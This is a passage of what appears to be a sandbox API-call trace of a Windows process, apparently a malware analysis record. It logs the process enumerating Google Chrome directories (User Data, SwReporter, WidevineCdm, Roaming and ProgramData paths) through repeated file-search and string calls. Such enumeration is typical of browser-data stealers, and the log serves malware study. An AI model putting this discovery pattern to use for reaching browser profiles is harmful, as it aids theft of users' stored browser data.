ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SwReporter", cAlternateFileName="SWREPO~1")) returned 1 [0162.906] lstrcmpiW (lpString1="SwReporter", lpString2=".") returned 1 [0162.906] lstrcmpiW (lpString1="SwReporter", lpString2="..") returned 1 [0162.906] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0162.906] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0162.906] lstrlenW (lpString="\\") returned 1 [0162.906] GetProcessHeap () returned 0x8e0000 [0162.906] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8a) returned 0x9252c8 [0162.906] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0162.906] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.906] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 68 [0162.906] lstrlenW (lpString="SwReporter") returned 10 [0162.906] GetProcessHeap () returned 0x8e0000 [0162.906] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9e) returned 0x925360 [0162.906] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.906] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="SwReporter" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter" [0162.906] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2df580, dwLength=0x1c | out: lpBuffer=0x2df580*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.906] GetProcessHeap () returned 0x8e0000 [0162.906] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0162.906] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned 78 [0162.906] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned 78 [0162.906] lstrlenW (lpString="\\*.*") returned 4 [0162.906] GetProcessHeap () returned 0x8e0000 [0162.906] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa6) returned 0x925408 [0162.906] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter" [0162.907] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\*.*" [0162.907] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\*.*", lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9ac0 [0162.907] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0162.907] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.907] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0162.907] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0162.907] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0162.907] FindClose (in: hFindFile=0x8f9ac0 | out: hFindFile=0x8f9ac0) returned 1 [0162.907] VirtualQuery (in: lpAddress=0x925408, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.907] GetProcessHeap () returned 0x8e0000 [0162.907] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925408 | out: hHeap=0x8e0000) returned 1 [0162.907] VirtualQuery (in: lpAddress=0x925360, lpBuffer=0x2df58c, dwLength=0x1c | out: lpBuffer=0x2df58c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.907] GetProcessHeap () returned 0x8e0000 [0162.907] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925360 | out: hHeap=0x8e0000) returned 1 [0162.907] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WidevineCdm", cAlternateFileName="WIDEVI~1")) returned 1 [0162.907] lstrcmpiW (lpString1="WidevineCdm", lpString2=".") returned 1 [0162.907] lstrcmpiW (lpString1="WidevineCdm", lpString2="..") returned 1 [0162.907] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0162.907] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0162.907] lstrlenW (lpString="\\") returned 1 [0162.907] GetProcessHeap () returned 0x8e0000 [0162.907] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8a) returned 0x9252c8 [0162.907] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0162.907] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.907] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 68 [0162.908] lstrlenW (lpString="WidevineCdm") returned 11 [0162.908] GetProcessHeap () returned 0x8e0000 [0162.908] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa0) returned 0x925360 [0162.908] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.908] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="WidevineCdm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm" [0162.908] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2df580, dwLength=0x1c | out: lpBuffer=0x2df580*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.908] GetProcessHeap () returned 0x8e0000 [0162.908] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0162.908] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned 79 [0162.908] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned 79 [0162.908] lstrlenW (lpString="\\*.*") returned 4 [0162.908] GetProcessHeap () returned 0x8e0000 [0162.908] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa8) returned 0x925408 [0162.908] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm" [0162.908] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\*.*" [0162.908] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\*.*", lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9ac0 [0162.908] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0162.908] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.908] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0162.908] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0162.908] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0162.908] FindClose (in: hFindFile=0x8f9ac0 | out: hFindFile=0x8f9ac0) returned 1 [0162.908] VirtualQuery (in: lpAddress=0x925408, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.908] GetProcessHeap () returned 0x8e0000 [0162.908] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925408 | out: hHeap=0x8e0000) returned 1 [0162.908] VirtualQuery (in: lpAddress=0x925360, lpBuffer=0x2df58c, dwLength=0x1c | out: lpBuffer=0x2df58c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.909] GetProcessHeap () returned 0x8e0000 [0162.909] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925360 | out: hHeap=0x8e0000) returned 1 [0162.909] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WidevineCdm", cAlternateFileName="WIDEVI~1")) returned 0 [0162.909] FindClose (in: hFindFile=0x8f9a80 | out: hFindFile=0x8f9a80) returned 1 [0162.909] VirtualQuery (in: lpAddress=0x926478, lpBuffer=0x2df58c, dwLength=0x1c | out: lpBuffer=0x2df58c*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.909] GetProcessHeap () returned 0x8e0000 [0162.909] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926478 | out: hHeap=0x8e0000) returned 1 [0162.909] VirtualQuery (in: lpAddress=0x9263e8, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.909] GetProcessHeap () returned 0x8e0000 [0162.909] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9263e8 | out: hHeap=0x8e0000) returned 1 [0162.909] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c593160, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c593160, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x58, dwReserved1=0x10000010, cFileName="User Data", cAlternateFileName="USERDA~1")) returned 0 [0162.909] FindClose (in: hFindFile=0x8f9a40 | out: hFindFile=0x8f9a40) returned 1 [0162.909] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.909] GetProcessHeap () returned 0x8e0000 [0162.909] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0162.909] VirtualQuery (in: lpAddress=0x8efdb0, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x8ef000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x38000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.909] GetProcessHeap () returned 0x8e0000 [0162.909] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8efdb0 | out: hHeap=0x8e0000) returned 1 [0162.909] GetProcessHeap () returned 0x8e0000 [0162.909] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0162.909] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0163.000] lstrlenW (lpString="C:\\ProgramData") returned 14 [0163.000] lstrlenW (lpString="\\Google\\Chrome") returned 14 [0163.000] GetProcessHeap () returned 0x8e0000 [0163.000] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x3a) returned 0x8f2780 [0163.000] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0163.001] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\Google\\Chrome" | out: lpString1="C:\\ProgramData\\Google\\Chrome") returned="C:\\ProgramData\\Google\\Chrome" [0163.001] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.001] GetProcessHeap () returned 0x8e0000 [0163.001] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.001] lstrlenW (lpString="C:\\ProgramData\\Google\\Chrome") returned 28 [0163.001] lstrlenW (lpString="C:\\ProgramData\\Google\\Chrome") returned 28 [0163.001] lstrlenW (lpString="\\*.*") returned 4 [0163.001] GetProcessHeap () returned 0x8e0000 [0163.001] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x42) returned 0x900390 [0163.001] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\Google\\Chrome" | out: lpString1="C:\\ProgramData\\Google\\Chrome") returned="C:\\ProgramData\\Google\\Chrome" [0163.001] lstrcatW (in: lpString1="C:\\ProgramData\\Google\\Chrome", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\Google\\Chrome\\*.*") returned="C:\\ProgramData\\Google\\Chrome\\*.*" [0163.001] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Google\\Chrome\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x7607cb17, ftCreationTime.dwLowDateTime=0xe, ftCreationTime.dwHighDateTime=0xafc80, ftLastAccessTime.dwLowDateTime=0x66001e, ftLastAccessTime.dwHighDateTime=0xc, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e75d0, nFileSizeLow=0x0, dwReserved0=0x1e, dwReserved1=0x7607c3d1, cFileName="", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.001] VirtualQuery (in: lpAddress=0x900390, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x900000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x27000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.001] GetProcessHeap () returned 0x8e0000 [0163.001] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x900390 | out: hHeap=0x8e0000) returned 1 [0163.001] VirtualQuery (in: lpAddress=0x8f2780, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x8f2000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x35000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.001] GetProcessHeap () returned 0x8e0000 [0163.002] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f2780 | out: hHeap=0x8e0000) returned 1 [0163.002] GetProcessHeap () returned 0x8e0000 [0163.002] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.002] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0163.002] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0163.002] lstrlenW (lpString="\\Google\\Chrome") returned 14 [0163.002] GetProcessHeap () returned 0x8e0000 [0163.002] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x78) returned 0x8efeb0 [0163.002] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0163.002] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\Google\\Chrome" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Google\\Chrome") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Google\\Chrome" [0163.002] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.002] GetProcessHeap () returned 0x8e0000 [0163.002] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.002] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Google\\Chrome") returned 59 [0163.002] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Google\\Chrome") returned 59 [0163.002] lstrlenW (lpString="\\*.*") returned 4 [0163.002] GetProcessHeap () returned 0x8e0000 [0163.002] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x80) returned 0x926360 [0163.002] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Google\\Chrome" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Google\\Chrome") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Google\\Chrome" [0163.002] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Google\\Chrome", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Google\\Chrome\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Google\\Chrome\\*.*" [0163.002] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Google\\Chrome\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x926360, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x926360, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0xa, ftLastWriteTime.dwHighDateTime=0xc, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x909f43, dwReserved1=0x3d00003d, cFileName="\r", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.002] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.002] GetProcessHeap () returned 0x8e0000 [0163.003] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0163.003] VirtualQuery (in: lpAddress=0x8efeb0, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x8ef000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x38000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.003] GetProcessHeap () returned 0x8e0000 [0163.003] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8efeb0 | out: hHeap=0x8e0000) returned 1 [0163.003] GetProcessHeap () returned 0x8e0000 [0163.003] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.003] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0163.003] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0163.003] lstrlenW (lpString="\\Google\\Chrome") returned 14 [0163.003] GetProcessHeap () returned 0x8e0000 [0163.003] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x74) returned 0x8efeb0 [0163.003] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0163.003] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Google\\Chrome" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome") 